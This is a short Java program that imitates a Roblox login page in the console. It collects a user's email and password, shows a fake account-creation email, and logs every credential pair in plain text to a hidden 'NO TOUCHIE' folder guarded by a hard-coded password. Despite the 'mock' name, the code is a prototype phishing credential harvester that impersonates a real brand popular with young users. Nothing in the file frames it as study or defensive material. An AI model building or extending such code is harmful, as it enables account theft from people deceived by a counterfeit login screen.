import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.util.Scanner;

public class RobloxLoginMock {
    private static final String FOLDER_NAME = "NO TOUCHIE";
    private static final String PASSWORD = "Fallen1038!";
    private static final String EMAIL_TEMPLATE = "Welcome to Roblox, %s! Your account has been created successfully.";

    public static void main(String[] args) {
        // Create the folder if it doesn't exist
        File folder = new File(FOLDER_NAME);
        if (!folder.exists()) {
            folder.mkdir();
        }

        // Simulate the login page
        Scanner scanner = new Scanner(System.in);
        System.out.println("=== Roblox Login Page ===");
        System.out.print("Enter your email: ");
        String email = scanner.nextLine();
        System.out.print("Enter your password: ");
        String password = scanner.nextLine();

        // Mock email sending
        sendMockEmail(email);

        // Save the response to the folder
        saveResponse(email, password);

        // Prompt for folder access
        System.out.print("Enter the password to access the folder: ");
        String inputPassword = scanner.nextLine();
        if (inputPassword.equals(PASSWORD)) {
            System.out.println("Access granted to the folder: " + FOLDER_NAME);
        } else {
            System.out.println("Access denied. Incorrect password.");
        }

        scanner.close();
    }

    private static void sendMockEmail(String email) {
        // Simulate sending an email
        String message = String.format(EMAIL_TEMPLATE, email);
        System.out.println("Sending mock email to: " + email);
        System.out.println("Email content: " + message);
    }

    private static void saveResponse(String email, String password) {
        // Save the email and password to a file in the folder
        File file = new File(FOLDER_NAME + File.separator + "responses.txt");
        try (FileWriter writer = new FileWriter(file, true)) {
            writer.write("Email: " + email + ", Password: " + password + "\n");
            System.out.println("Response saved to " + file.getAbsolutePath());
        } catch (IOException e) {
            System.out.println("An error occurred while saving the response: " + e.getMessage());
        }
    }
}
